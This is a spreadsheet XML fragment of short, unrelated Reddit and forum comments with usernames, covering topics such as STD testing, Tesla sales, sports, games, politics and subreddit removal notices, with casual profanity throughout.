    <t>Hello hope all is well. I have a question to ask on false negative std results and their time frame. To cut a long story short me and my partner have been in a relationship for 4 years and both had HIV tests done before which were both negative. Within a year of our relationship my partner stared getting constant sharp pains on there left ribs (spleen maybe?) then started passing blood when going to take a dump. Also complained of constant headaches etc. The same exact symptoms then started happening to me about a year ago. We both got an hiv tests last year and both came up negative and the symptoms subsided quite a bit. Then about two months ago my symptoms started again but much more intensely than before. I then decided to get a full blood test which included HIV, Syphilis and Hep b and c. I just received my results today thinking we probably had something possibly syphilis but to my surprise the results came back negative. Why I am surprised is that we often show the same symptoms especially the discomfort in the left rib area after eating or staying in the same position. I am now set for a CT scan on Monday to get a better look at what is going on. So is it still possible to receive a false negative in such things like Syphilis, hep b and c 4 years after contracting it? Thanks</t>
  </si>
  <si>
    <t>EVNow</t>
  </si>
  <si>
    <t>T3slaOwner said: ↑ Why not??? They have built a whole new line. That gets depreciated over time if the cars are built or not. No small part of the costs. There are two parts here. Some are depreciated linearly with time and other linearly with production. Most of the Y investment is likely in tooling that gets depreciated according to production. They are not spending much on equipment, building and office. Reasonable, but the devil is in the details. Also very likely is a drop in model 3 sales as the Y fills backlog orders doubling up your hump effect. That could easily put the company back into the RED. Model 3 cannibalization is not a big problem - after all Y will have higher ASP and higher margin. Other way is a problem (like how S&amp;X have been cannibalized by 3). As long as Tesla knows what mix of 3 &amp; Y to produce, and the total # is more than what they have with 3 alone now, its fine.</t>
  </si>
  <si>
    <t>DoYouWant10Dollars</t>
  </si>
  <si>
    <t>They do. But I don't assume they're out to get my like you seem to do. Choosing to be annoyed is one of the most unproductive things I can think of.</t>
  </si>
  <si>
    <t>Were his works a comedy or a tragedy?</t>
  </si>
  <si>
    <t>RealFunction</t>
  </si>
  <si>
    <t>so you support tiktok banning lgbt content then? good to know.</t>
  </si>
  <si>
    <t>Cupcakes_n_Hacksaws</t>
  </si>
  <si>
    <t>What's good about field prep? Perk seemed trash to me...</t>
  </si>
  <si>
    <t>mgrannyrat</t>
  </si>
  <si>
    <t>Exactly - I feel this has already happened quite a bit. I tend to give in because I want to make her happy and give her what she wants. Usually I'm stronger willed in making decisions, but I'm new to the marriage thing and I coddle her a lot.</t>
  </si>
  <si>
    <t>Sweetkeetcheecks</t>
  </si>
  <si>
    <t>how did you even come to that conclusion lol</t>
  </si>
  <si>
    <t>ProdigalNative</t>
  </si>
  <si>
    <t>Probably the worst one is when people ask what question I hate being asked.</t>
  </si>
  <si>
    <t>Federer343</t>
  </si>
  <si>
    <t>Kelce bruh you're really starting to piss me off</t>
  </si>
  <si>
    <t>julzthemadman691</t>
  </si>
  <si>
    <t>This ends up being the most inconsequential battle every year and we dedicate actual brain power to it which is funny.</t>
  </si>
  <si>
    <t>Golem25</t>
  </si>
  <si>
    <t>For better or worse, audiences are 'spoilt' by the Premier League, La Liga, Serie A, Eredivisie (okay, let's not kid ourselves on that one) being available to watch for a fee. I've seen it during my travels throughout Asia and bits of Africa - even at local level in Europe; people abandon their local leagues in favour of that fancy-schmancy top level play. I got laughed off a training ground in Mauritius for trying to buy a local shirt - 'eh foreign man, go buy Manchester shirt'. It is simply impossible for the A-League, or smaller European leagues, to succesfully emulate the top leagues, but standard of play needs to reach a certain level to be palatable to casual football fans - the kind that has been fed European leagues. I'm not sure if the A-League is currently at that level, but quite desperately sure that these talented young lads will be around to uplift the league if they turn out to be as good as we hope they will be.</t>
  </si>
  <si>
    <t>blorkflabblesplab</t>
  </si>
  <si>
    <t>there have been a lot of police trade ins floating around reddit so my bet would be yes</t>
  </si>
  <si>
    <t>I agree with you on that definition. They should stop the infringement on everyone’s right to bear arms.</t>
  </si>
  <si>
    <t>Dfmahone</t>
  </si>
  <si>
    <t>Agreed 100%. I think it has to come from their pension funds. Then you would see compliance. What does it bother an officer to get a three month vacation with pay for this shit when they don’t pay?</t>
  </si>
  <si>
    <t>Pure_Equivalent</t>
  </si>
  <si>
    <t>literally though, i strongly dislike trudeau but scheer would be so much more problematic</t>
  </si>
  <si>
    <t>upL8N8</t>
  </si>
  <si>
    <t>That all depends. Isn't the argument that EVs will see lower depreciation? So who is really being rewarded? &gt; A revenue neutral carbon tax or a gas guzzler tax with offsetting incentives on efficient vehicles would do more to move the market quickly. Absolutely. Carbon taxes is what I typically suggest instead of subsidies. It puts a lot more pressure on existing car owners to upgrade, or to find ways to use less fuel. This could of course be used in conjunction with subsidies / loan support. &gt; Yes. Total cost of ownership is comparable, but the purchase price of EVs is still more than gas cars. Purchase price is almost never bought in cash. A loan is taken, and hence the price is spread between monthly payments. If monthly payments go up, but gas spending goes down, it's not exactly a huge price increase. &gt; Tesla has had several quarters with sales outpacing production, Tesla is still primarily constrained by their production capacity. Tesla's also adding new markets every quarter with a backlog of orders in those markets. If they stopped adding new quarters so quickly, we have no idea what would happen to their sales in existing markets, TBH. We did see US sales drop off a bit; which I would expect Tesla would prefer/prioritize over international sales. &gt; Adding new Instagram friendly features like Smart Summon and Caraoke creates more brand/product awareness than traditional advertising would. If you're on instagram to see people posting, and of course if your social group is into EVs. Maybe in CA, but come checkout Michigan sometime. ;) &gt; Mainstream automakers don't make much selling their compliance EVs and don't really want to sell them. Their dealers would rather make a quick sale than explain the intricacies of EV charging. I think you mean "dealerships". Why would mainstream automakers care? A sale's a sale. Only, if that sale doesn't come back for warranty work that their dealership has to perform, the manufacturer saves money. The real issue is that dealerships actively advertise against EVs, and help cause sales numbers to come in low on EVs. If demand picks up, it pays for the manufacturer to increase production and get those economies of scale production savings.</t>
  </si>
  <si>
    <t>TheGreatRandolph</t>
  </si>
  <si>
    <t>I travel a LOT between work and my free time (recently moved into a van, when I’m not on location for work). Small local crags are absolutely my favorite.</t>
  </si>
  <si>
    <t>Lazarus-risen</t>
  </si>
  <si>
    <t>HERESY! That’s it. Thanks! [solved!]</t>
  </si>
  <si>
    <t>Bros....be honest with me, what are the chances of Rosettas 5* being about her and Io ? I made a ring for Rosetta but....I don't think I'll survive another cuckening</t>
  </si>
  <si>
    <t>orangevelociraptor</t>
  </si>
  <si>
    <t>If I told Mormon friends or family I had watched these videos most would be so offended/horrified they wouldn't speak to me again. Most Mormons consider temple rituals to be incredibly sacred.</t>
  </si>
  <si>
    <t>sent_16</t>
  </si>
  <si>
    <t>Someone explain to me why everyone hated blizzard now?</t>
  </si>
  <si>
    <t>Alsatina91</t>
  </si>
  <si>
    <t>Because the degree of the offense actually matters. Both of them are bad one is worth than the other. But people want equal punishment.</t>
  </si>
  <si>
    <t>PDXPTW</t>
  </si>
  <si>
    <t>I kinda like the Michael Pollan theory of eat what you want, mostly vegetables. Of course basic clean eating rules apply like no processed foods, limit sodium intake, etc.</t>
  </si>
  <si>
    <t>ragaba999</t>
  </si>
  <si>
    <t>Is this still available?</t>
  </si>
  <si>
    <t>blindlytrustedfart</t>
  </si>
  <si>
    <t>Hmm I didn’t know my character had to be ugly as shit forever. Time for a makeover</t>
  </si>
  <si>
    <t>Stridyr</t>
  </si>
  <si>
    <t>Wth?!!! I was really enjoying his posts and felt that this sub had come alive again! Not to mention that he just became a moderator for this Reddit! Noah! Where you be?!!!</t>
  </si>
  <si>
    <t>cocoabean</t>
  </si>
  <si>
    <t>Get people hooked, dial it down to the cheapest shit that still sells.</t>
  </si>
  <si>
    <t>hellla</t>
  </si>
  <si>
    <t>On PC, Pavlov is not free. There’s a difference.</t>
  </si>
  <si>
    <t>AutomaticImage</t>
  </si>
  <si>
    <t>Wow. Many thanks for your post and reminding me of the hell of being drunk or hungover. I was exactly the same as you. So ashamed of my drunken behaviour. But at long last I managed to get sober after over 40 years of binge drinking hell. Keep up the great effort</t>
  </si>
  <si>
    <t>Marc_Quill</t>
  </si>
  <si>
    <t>I'm gonna guess that some of the strange graphical glitches we've seen like Bianca Belair's weird hair or Asuka's hair popping out of her head are gonna get patched for Day 1.</t>
  </si>
  <si>
    <t>BrownDriver</t>
  </si>
  <si>
    <t>Lmao what the hell happened here??</t>
  </si>
  <si>
    <t>69DirtyDog69</t>
  </si>
  <si>
    <t>This will be the perfect summer to target Son.</t>
  </si>
  <si>
    <t>UnKnownSurviving</t>
  </si>
  <si>
    <t>I always love the the country side. It's more peaceful than the city. And the people in the country side is little better than the city. I'm planning to live in the country side, soon. With my dog at my side, and my home there. The city people are worse than the country people. And they're getting worse every year.</t>
  </si>
  <si>
    <t>iamgosha</t>
  </si>
  <si>
    <t>hey man! thanks for your thoughts. i’m not sure im sold on your argument. cost is not an issue. the issue is, as i mentioned in another reply, that in my opinion, there is a better 88LB than 88 shazier. there is a better 90LB than 90 shazier. at this rate there very likely will be a better 92/94/96 LB than 92/94/96 Shazier. his stats dont fascinate me.</t>
  </si>
  <si>
    <t>sibre2001</t>
  </si>
  <si>
    <t>It's a cycle. That takes tens of thousands of years to complete. In that time life has time to adapt and adjust. Even so, large parts of the environment go extinct. Instead of that cycle taking thousands of years, we've reduced it down to decades. Evolution doesn't happen in decades. So now we're going through a mass extinction. The cyclic rate of climate change is already accounted for when scientists are talking about us causing issues in the climate. You guys aren't blowing anyone's minds here.</t>
  </si>
  <si>
    <t>wcuprof</t>
  </si>
  <si>
    <t>This brings back yummy memories!</t>
  </si>
  <si>
    <t>anonymousampersands</t>
  </si>
  <si>
    <t>do you mean as a single parent? Or just for certain periods of time?</t>
  </si>
  <si>
    <t>ThisWeirdCat</t>
  </si>
  <si>
    <t>That also goes with the us in history books</t>
  </si>
  <si>
    <t>kestrel4747</t>
  </si>
  <si>
    <t>My BD brings in a TV towards the end of the year, just to wreck everyone in Smash</t>
  </si>
  <si>
    <t>mizredhead</t>
  </si>
  <si>
    <t>I duno, I think we were seeing a different Kam shimmying around in that black bathing suit. She looked hot and less like a prudish bitch.</t>
  </si>
  <si>
    <t>friendlysatan69</t>
  </si>
  <si>
    <t>Yeah.. it is really the only reason</t>
  </si>
  <si>
    <t>spurrit</t>
  </si>
  <si>
    <t>Has it ever occurred to the folks here talking out of their asses to just sit back and learn? A.) Not a vet, necessarily, just a cowboy. B.) No way to tell this is a cutting horse based on this. Cutting is a specialized arena event. On a ranch, there is really very little cutting like you see in the arena. If a critter(cow, calf, heifer, bull, steer) is that determined to return to the herd, it turns into more of a reined cowhorse/camp drafting kind of thing, or you call in more help or just rope them and drag them out. C.) Horses that are used to handle cattle every day start to get aggressive towards cattle. Particularly if they're used in close quarters and get crowded by cattle too much. If they've been hooked or hit to often, they're likely to flat out HATE cattle, and will bite or kick any that get too close. D.) Protecting the rider isn't really something we train them to do, it just sort of happens, particularly if you treat your horse well. (No amount of internet bullshit about being "partners" is involved here.)</t>
  </si>
  <si>
    <t>mochaswift13</t>
  </si>
  <si>
    <t>yeah, I feel like everyone had the other test! kinda sucks cause I can’t ask anyone what they got since barely anyone had my questions</t>
  </si>
  <si>
    <t>Pseudo-ku</t>
  </si>
  <si>
    <t>Good article and appreciate the post, but with respect, this has nothing to do with Canberra.</t>
  </si>
  <si>
    <t>Obscurity</t>
  </si>
  <si>
    <t>Originally Posted by gdgyva dont know the exact hypothetical, but maybe those 9 judges make that ruling because they think the legislature is overstepping their bounds maybe it needs to be a constitional amendent and not a law? just because you dont like rulings those judges make, doesnt mean they arent the right rulings And just because you do like the rulings justices make does not mean they aren't the wrong rulings. Entirely too much emphasis is placed on 9 unelected officials and their power over every day life is entirely too great. And yes, plenty -should- be an amendment; however, we're at an impasse. The people overwhelmingly support some issues, however, no amendments are really proposed or discussed; politicians don't want to do their job, so they allow the court to continue acting as all three branches; determining who can spend what, who can legislate what, and who can do what.</t>
  </si>
  <si>
    <t>touchwithabargepole</t>
  </si>
  <si>
    <t>It does where I am. But out of interest, what criteria must one meet to be a slut?</t>
  </si>
  <si>
    <t>papastore93</t>
  </si>
  <si>
    <t>you're wrong hypothermia is</t>
  </si>
  <si>
    <t>Church-of-Nephalus</t>
  </si>
  <si>
    <t>Two girls, one with blue hair and one with brown hair, go batshit for about two seasons and apparently they're only in middle school somehow.</t>
  </si>
  <si>
    <t>CreepyLibrary</t>
  </si>
  <si>
    <t>Costa is much more explosive and athletic. Plus Costa has way more power, look at his record and everyone was TKOd besides one submission and Yoel, who is super human and has a fused neck. Those punches and especially that kick Costa connected on Yoel would have knockout any other fighter</t>
  </si>
  <si>
    <t>viezeman530</t>
  </si>
  <si>
    <t>I saw on the lineup that Julian Savea was wearing the no. 20 jersey today in the match against La Rochelle. Did anybody watch the game and see if he played in the forwards when he came on?</t>
  </si>
  <si>
    <t>Patches67</t>
  </si>
  <si>
    <t>If this is becomes normal, then just straight up ignoring the law and constitution becomes normal. If it comes to that you'll be lucky you even have an election next year.</t>
  </si>
  <si>
    <t>abca98</t>
  </si>
  <si>
    <t>the Unwise!</t>
  </si>
  <si>
    <t>shedyemai</t>
  </si>
  <si>
    <t>Thanks for doing the math</t>
  </si>
  <si>
    <t>PleaseNotPoll</t>
  </si>
  <si>
    <t>gooner4ever said: ↑ I will have to check how they cost as actually can’t remember ! Anyway hopefully it’s a good craic Click to expand... Just let someone know that you're a Goon on the way out, so that we can have the seat thoroughly disinfected.</t>
  </si>
  <si>
    <t>magpieontheprize</t>
  </si>
  <si>
    <t>Thank you! I just had a look at your comment history and wow congratulations! I’m so happy for you Bruin!</t>
  </si>
  <si>
    <t>cf3303</t>
  </si>
  <si>
    <t>Incest and traffic lights :)) I'd say it would be cool to ask him what happens once most of the workforce have been forced out the country.</t>
  </si>
  <si>
    <t>Emily T.</t>
  </si>
  <si>
    <t>Really appreciated the care I received from Dr. Stierman. Would recommend her to anyone!</t>
  </si>
  <si>
    <t>RequiemAA</t>
  </si>
  <si>
    <t>If you can fly Assault Frigates (or have generally very good frigate skills and can fly a somewhat bling'd t1), you can try solo'ing t1/t2 frigate abyssals as well. Definitely teaches you how to fly.</t>
  </si>
  <si>
    <t>xsalvaz</t>
  </si>
  <si>
    <t>Which is $21 too much, to be fair. With or without insurance, it shouldn't cost you anything.</t>
  </si>
  <si>
    <t>Gavel_Guide</t>
  </si>
  <si>
    <t>It's not "because of the publisher" in an abstract sense. It's because the publisher doesn't want me to have certain rights that I feel I deserve. Fuck them. And if theyre going to use their power to bully and hurt others, then they need to be stopped. I'm not being a sheep. Im against Blizzard because I like thinking for myself and expressing those thoughts, and Blizzard thinks I shouldn't be allowed to.</t>
  </si>
  <si>
    <t>seanmikeyy</t>
  </si>
  <si>
    <t>Yeah what he said. Holy shit</t>
  </si>
  <si>
    <t>eyeGunk</t>
  </si>
  <si>
    <t>I mean... same thing happened when Scalia died. Politics is just really tribal right now.</t>
  </si>
  <si>
    <t>tessah22</t>
  </si>
  <si>
    <t>These aren't "signs", they're blatant examples. You leave because you want to. His arguments against it mean nothing. He's a sad, sorry excuse for a human being and your way too good to water your time on him.</t>
  </si>
  <si>
    <t>thebaldeagle009</t>
  </si>
  <si>
    <t>You seem to have a parent obsession, figures.</t>
  </si>
  <si>
    <t>Hitorishizuka</t>
  </si>
  <si>
    <t>They do, that's why one strategy people are using is that once you are done with Ideans and only need Astras, you sit on 9 and farm 9-1 and 9-2 over and over.</t>
  </si>
  <si>
    <t>ShartFlex</t>
  </si>
  <si>
    <t>TLDR: Buy low, sell high. Groundbreaking stuff.</t>
  </si>
  <si>
    <t>DoesntReadMessages</t>
  </si>
  <si>
    <t>Free shelters have been phased out in favor of private shelters almost entirely in the US for two main reasons: 1. They generally have to euthenize at much higher rates and offer significantly lower quality of care due to budget constraints. It's frankly easier to get donations as a respectable private shelter than to get more tax money as a dog prison/death row. 2. Adoption fees significantly reduce the likelihood of impulse adoptions and pet abandonment, and microchips make it easy to track and blacklist owners who do this.</t>
  </si>
  <si>
    <t>derf82</t>
  </si>
  <si>
    <t>Nope. Closest is near Cincinnati.</t>
  </si>
  <si>
    <t>IVIUT3D</t>
  </si>
  <si>
    <t>I would rather see Riot Squad hold all the female belts on one show than see Liv go face. Riot Squad should have held the womens tag titles first imo, they really let them die out slowly.</t>
  </si>
  <si>
    <t>jdubs952</t>
  </si>
  <si>
    <t>Jones for rocked. I think he was down playing a concussion</t>
  </si>
  <si>
    <t>BrawlerKingBS</t>
  </si>
  <si>
    <t>It's ok, thanks for ur help</t>
  </si>
  <si>
    <t>tsarslavyan</t>
  </si>
  <si>
    <t>Don’t you mean Erik the clown?</t>
  </si>
  <si>
    <t>eatthedead</t>
  </si>
  <si>
    <t>They let Rusev demolish a legend..and Randy Orton... Sounds like a sorry to me! Keep up the apologies WWE</t>
  </si>
  <si>
    <t>ElvenAttackSquad</t>
  </si>
  <si>
    <t>Its on the way there lol</t>
  </si>
  <si>
    <t>krsitof1000</t>
  </si>
  <si>
    <t>subnautica is a game actually and its very good in my prespective</t>
  </si>
  <si>
    <t>katnebel</t>
  </si>
  <si>
    <t>Wtf am I watching? 2 idiots</t>
  </si>
  <si>
    <t>Pheerful</t>
  </si>
  <si>
    <t>"Turned out?" He was one of the key people who sold us the WMD lie to get us into the Iraq war. I don't know why anyone ever thought his report would be anything more than "Well he might have done something bad" and some vigorous shoulder shrugging</t>
  </si>
  <si>
    <t>imalldutch</t>
  </si>
  <si>
    <t>From the Scheveningen Pier in The Hague, Nederlands on a beautiful summer day.</t>
  </si>
  <si>
    <t>Ccaleb_64-YT</t>
  </si>
  <si>
    <t>1. I get mad only when I get a squad wipe while there watching then they loot my stuff but only take the real good stuff like the gold shield</t>
  </si>
  <si>
    <t>FakeTaxiCab</t>
  </si>
  <si>
    <t>[Link to longer video.](https://youtu.be/SWvZnZ1lHkg) She sent the video and a letter explaining the situation to that News Channel.</t>
  </si>
  <si>
    <t>BzzBzz-Im-A-Bee</t>
  </si>
  <si>
    <t>I’m not brainwashed? I barely like headhunter skins, I’m just saying Dynamo would’ve been better off if it was a headhunter skin. I’m thinking you’re the one who’s brainwashed because you can’t handle someone asking a fucking question.</t>
  </si>
  <si>
    <t>QuicksandBed</t>
  </si>
  <si>
    <t>I give it a week before everything related to this game is downvoted for cringe</t>
  </si>
  <si>
    <t>ratshitty_heavenjoke</t>
  </si>
  <si>
    <t>Obama didn't really do anything notable.</t>
  </si>
  <si>
    <t>god_of_something</t>
  </si>
  <si>
    <t>Wait, what? I've only ever seen the movies. You joking, or is that in the show??</t>
  </si>
  <si>
    <t>duluthralphie</t>
  </si>
  <si>
    <t>MROO said: Smart Man! As a bonus, letting the boxes sit around for awhile makes it all the better. A layer of dust gives credence to the "for a while" response! Click to expand... In my shop a layer of dust takes about 12 minutes to accumulate.</t>
  </si>
  <si>
    <t>jamee1</t>
  </si>
  <si>
    <t>It's a weird angle all right. Similar in Race 4 just now where if you didnt know the angle you would think the 6 got up to beat the 4. It's because the camera is quite a bit behind the finish line and the high elevation gives you no reference point on the near side of the track.</t>
  </si>
  <si>
    <t>Terminal-Psychosis</t>
  </si>
  <si>
    <t>Didn't save? Was never lost to begin with though. No need for any saving. Biden on the other hand... He's lost. He straight up bragged about his crimes, on video no less. The whole world can watch him admit it in his own words.</t>
  </si>
  <si>
    <t>13-black-cats-</t>
  </si>
  <si>
    <t>I throwed radish in someone's garden thinking they would be supper happy to see them and would believe some had growed in their garden</t>
  </si>
  <si>
    <t>PsychicTempestZero</t>
  </si>
  <si>
    <t>The great Crablante</t>
  </si>
  <si>
    <t>dougan25</t>
  </si>
  <si>
    <t>Sure glad these journalists are held to decent standards so we don't have misinformation spreading.</t>
  </si>
  <si>
    <t>5708ski</t>
  </si>
  <si>
    <t>I'm 19 and I've done this as a hobby for a couple of years. Most high-school art departments still have one.</t>
  </si>
  <si>
    <t>Xyltin</t>
  </si>
  <si>
    <t>Below 1% PR. Stats for niche picks tend to be higher. We saw poppy lose WR after a buff due to the PR increase. And that not just for 1 Week (learning curve)</t>
  </si>
  <si>
    <t>The above submission has been **removed** because: * It does not appear to contain a tl;dr or any sort of short summary. Please create anew post including a tl;dr. Refer to FAQ: [What is TL;DR? Why do I need it?](http://www.reddit.com/r/relationships/wiki/index#wiki_what_is_tl.3Bdr.3F_why_do_i_need_it.3F) for some pointers. If you feel you are receiving this message in error, please [contact the moderators](http://www.reddit.com/message/compose?to=%2Fr%2Frelationships⊂ject=Submission+removed+for+no+TLDR&amp;message=My+post+can+be+found+at:+https://www.reddit.com/r/relationships/comments/dd4ddt/me_17m_my_girlfriend_16f_and_im_just_looking_for/) and include your problem Please note if you feel your post is too short for a tl;dr we will likely consider it too short to get meaningful input. You must make a new post with the amended information. Please ensure that the submission complies to **all the rules** listed in the sidebar, and in the [wiki](/r/relationships/wiki/index#wiki_about_.2Fr.2Frelationships) (relevant for mobile users). When you are done, please repost your submission. --- *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/relationships) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>Scott_TargetTestPrep</t>
  </si>
  <si>
    <t>Remember, what they’ve provided is “average” scores. Thus, some accepted students have scored below the averages and others have scored above. Since you scored above the verbal and quant average scores and seem to be a solid applicant, I think that you should be fine. If you are overly concerned, you could reach out to the folks in admissions to see if they can provide some clarity.</t>
  </si>
  <si>
    <t>AdmiralAkbar1</t>
  </si>
  <si>
    <t>The Taiwanese government would never do this, it would be suicidal. It's universally understood that a Taiwanese declaration of independence would result in the PRC declaring war on them. There was a bunch of tension in the early 2000s when a proposed Taiwanese constitutional amendment would've dropped claims on the mainland, because it was seen by the PRC as a preface to a declaration of independence. If Taiwan declares independence, the PRC will immediately start pounding the island with missile bases on the mainland. The US and Taiwan are both hesitant to have any more US military bases there for that reason: with the rising prevalence of missiles in the past couple decades, it would simply be a bunch of defenseless targets. The US would probably still have naval dominance in the Taiwan Straits (because we have a tech and experience advantage), but China under Xi has poured shitloads of money into its navy, so they're closer to parity than one might think. Furthermore, the US wouldn't be able to do any attacks on the Chinese mainland in response, because a.) that would definitely trigger nuclear retaliation, and b.) the Chinese have put their conventional and nuclear missile commands in the same places (to deter people from destroying the conventional missile commands). Look, I have as much disdain for Xi and the CPC as the next guy, but the idea of Taiwanese independence in the near future is a pipe dream.</t>
  </si>
  <si>
    <t>Yokies</t>
  </si>
  <si>
    <t>No no no no... it won't be a diablo game anymore. It'll be a skyrim a darksouls a whatever. Please just no.</t>
  </si>
  <si>
    <t>feedthegesse</t>
  </si>
  <si>
    <t>Not even top 5, she was so paranoid an her crying cheapened her game, no way I can respect that tactic. Outside of that she would be a better player, but her terrible mood swings and crying really take away from her overall in my opinion</t>
  </si>
  <si>
    <t>Rollerbladersdoexist</t>
  </si>
  <si>
    <t>I work for a big wireless company. That’s a Sprint store and that’s standard behavior to steal the demo phones off a display. The phones are tethered to an alarm and it’s easier to grab a handful and yank them until it pulls from the alarm base. If it’s a corporate store, the phones are fully capable but they’ll shut the service off on them. They’ll also figure out what phones are gone and blacklist them but by that time the dude probably sold it for a couple hundred.</t>
  </si>
  <si>
    <t>ccruner13</t>
  </si>
  <si>
    <t>Blowing his wad on 1-2 innings instead of trying to go 7-9.</t>
  </si>
  <si>
    <t>qualityseabunny</t>
  </si>
  <si>
    <t>Holy shit you could crush a terf skull with your thighs!!! Thats life goals right there! Keep on being your cute self!</t>
  </si>
  <si>
    <t>The Nully</t>
  </si>
  <si>
    <t>WildCard999 said: So since your playing a bit of everything then you'd probably benefit from a higher refresh monitor but for your slower paced games I'd also go 1440P. With your budget I'd get this. PCPartPicker Part List Monitor: Samsung LC27JG50QQNZA 27.0" 2560x1440 144 Hz Monitor (£249.00 @ Amazon UK) Total: £249.00 Prices include shipping, taxes, and discounts when available Generated by PCPartPicker 2019-10-04 15:00 BST+0100 Single player games, up the settings and play at a lower refresh rate (whatever the GTX 1080 can do). Multiplayer competitive titles, adjust for 144hz. As for the 60 vs 144 vs 240 the difference can be noticeable but it depends on the game. Faster paced competitive shooters &amp; racing titles you can see the difference between all 3 however for single player, slower games the difference is minimal. 144hz gives you a good all around speed which would be good for any type of games. Also with 240hz the only supported panel type is TN which has poorer colors then VA or IPS (the recommendation above is VA). Click to expand... Thanks for the information there. Very helpful indeed. So your suggestion in a nutshell would be a 144hz monitor with a VA panel? What do you mean by “multiplayer competitive titles, adjust for 144hz” - ideally I don’t want to be going into system settings and adjusting everything before I play games. Do you just mean adjust the games settings to optimise for 144hz play? Can you make a recommendation for a non-curved monitor? I never seem to get on with curved screens. Thanks a bunch</t>
  </si>
  <si>
    <t>&gt;&gt;268910441 What usable cav of yours dont have max flowers already? I think the only thing more useless than cav flowers is armor flowers</t>
  </si>
  <si>
    <t>nayan99agal</t>
  </si>
  <si>
    <t>i mean second top scorer is rivaldo with 22 in 43 games for barca , but suarez has played with better teams he needs to better, 5 goals in last 29 games in cl is unacceptable</t>
  </si>
  <si>
    <t>tratow</t>
  </si>
  <si>
    <t>@Felixxberg said... Playing Klefbom with them is a really hard task! My two placeholder lineups have power lines, so I had to punt Ds. I might tweak them according to line matching stats. Yeah… I ended up with some horrible punts with Klef but its tempting!! I think he can be faded for a cheaper price play though..</t>
  </si>
  <si>
    <t>bewaredandelo</t>
  </si>
  <si>
    <t>Meased up or made better?</t>
  </si>
  <si>
    <t>mrdexie</t>
  </si>
  <si>
    <t>This isn't Amnesty International's though</t>
  </si>
  <si>
    <t>Supremebeing51</t>
  </si>
  <si>
    <t>Man the ACC sucks.</t>
  </si>
  <si>
    <t>OneTwoWee000</t>
  </si>
  <si>
    <t>You have deep, *deep* issues. You seek out this abusive as fuck guy and get turn on when he degrades you yet keep claiming you’re ashamed. You are not well. Seek help. It’s serious enough that you probably need in-patient care.</t>
  </si>
  <si>
    <t>MyIncapableOne</t>
  </si>
  <si>
    <t>@CosmicVagina Thanks so much for the Anthropologie code</t>
  </si>
  <si>
    <t>Elitesparkle</t>
  </si>
  <si>
    <t>Just to clarify: Percent-based Damage has a cap on any target, not only Veichles.</t>
  </si>
  <si>
    <t>MaestroPirlo21</t>
  </si>
  <si>
    <t>For some reason I always play best with 4231 wide. Just so balanced to me. But it does depend on your team as well.</t>
  </si>
  <si>
    <t>ilessthanthreethis</t>
  </si>
  <si>
    <t>Yup, you can't get the self-referral but can still use someone else's. Here's my standard copy-paste blurb on those: Remember to use the [referral links via Rankt](https://churning.rankt.com/referrals) when they have the best offers, to pay it forward to members of this sub! You can use the automatic random link or search for a particular username if there's someone whose link you want to use. Ignore any PMs you get soliciting referrals (see discussion [here](https://www.reddit.com/r/churning/comments/81r6pf/psa_solicitation_of_referrals_using_private/?st=JJUMA1W7&amp;sh=56d94948)).</t>
  </si>
  <si>
    <t>MyBellyHurtsITry</t>
  </si>
  <si>
    <t>What's Han Solo going there?</t>
  </si>
  <si>
    <t>pancakerz</t>
  </si>
  <si>
    <t>I even bought the game on steam before they made it pay2play. and i've never thrown a match, unless you count ranked crybabies who consider literally anything to be a gamethrow</t>
  </si>
  <si>
    <t>Gamerappa</t>
  </si>
  <si>
    <t>I wonder how many blocks the bot walked up to comparing to that one guy who made a series of going to the farlands without cheating</t>
  </si>
  <si>
    <t>RolandMT32</t>
  </si>
  <si>
    <t>Benadryl Cabbagepatch wasn't that bad as Khan..</t>
  </si>
  <si>
    <t>LordEpping</t>
  </si>
  <si>
    <t>Weird. This brand is everywhere in Superior, but only in liquor stores.</t>
  </si>
  <si>
    <t>vaperXant</t>
  </si>
  <si>
    <t>Blitzdonlife said: ↑ Good luck, hope SNUS works out for you. I'll have to look into RYN, thinking about getting into SNUS lately. Click to expand... RYN actually isn't SNUS, it's nicotine SALT flavored pouches with nicotine extract only, no tobacco apparently. Thank you though! I also ordered one online called ON! Berry 4 MG which is apparently like redbull flavor.</t>
  </si>
  <si>
    <t>princssofpink</t>
  </si>
  <si>
    <t>I don't disagree that they're behind the times in terms of representation, I was just offering my opinion of what the show's reasoning may be.</t>
  </si>
  <si>
    <t>klashmafia</t>
  </si>
  <si>
    <t>I have been told that it depends on what you are trying to say with your tattoos. Body modification is one I don't remember anything about, sorry.</t>
  </si>
  <si>
    <t>Traitor_Orange</t>
  </si>
  <si>
    <t>Census bureau asks states for data that includes citizenship information: report</t>
  </si>
  <si>
    <t>augustv123</t>
  </si>
  <si>
    <t>Is it bad if I stack Kyler, Fitz, and Edmonds?</t>
  </si>
  <si>
    <t>benwsapp</t>
  </si>
  <si>
    <t>plus he's got a name like the butcher on the corner like Trubisky does</t>
  </si>
  <si>
    <t>PJ09</t>
  </si>
  <si>
    <t>Hi, /u/itsjustrj Thank you for participating in r/iphone. Unfortunately, your submission was removed for breaking the following rule(s): ________________________________________________________________________________________________________________ &gt; **Rule 7** Posts must be about the iPhone in general. For all discussions about iOS or iOS beta specifically, please move the discussion to r/iOS or r/iOSBeta. We don't allow spam or irrelevant self-promotion without authorization from the moderators. ________________________________________________________________________________________________________________ Reposting posts removed by a moderator without express permission is not allowed. Not here, and not on most of reddit. Please read reddiquette (linked below). For questions, comments and concerns, [message the moderators.](https://www.reddit.com/message/compose?to=/r/iphone) [Reddiquette](https://www.reddit.com/wiki/reddiquette) | [New to Reddit?](https://www.reddit.com/wiki/reddit101) | [Reddit's Content Policy](https://www.reddit.com/help/contentpolicy/)</t>
  </si>
  <si>
    <t>liquidchainsaw</t>
  </si>
  <si>
    <t>The real shit that's going on here, is like the angry one is mad at the other one, and the other one is like thinking: "Shut the fuck up, bitch!" But the bitch just won't shut the fuck. And I'm willing to bet, this isn't the only video of this floating around the web. All these little motherfuckers be walking around with cameras on their phones. Ready for the next thing. The next big thing. And that quiet bitch, she's thinking: "After tonight, this motherfucking fucking bitch, will never call my ass out in public again. Mind of a ninja with a deep heart of passion. Keep that shit cool, girly. Fuck! The good folks of me high school are recording this freakout for the God damn Internet."</t>
  </si>
  <si>
    <t>idiosyncraticg1</t>
  </si>
  <si>
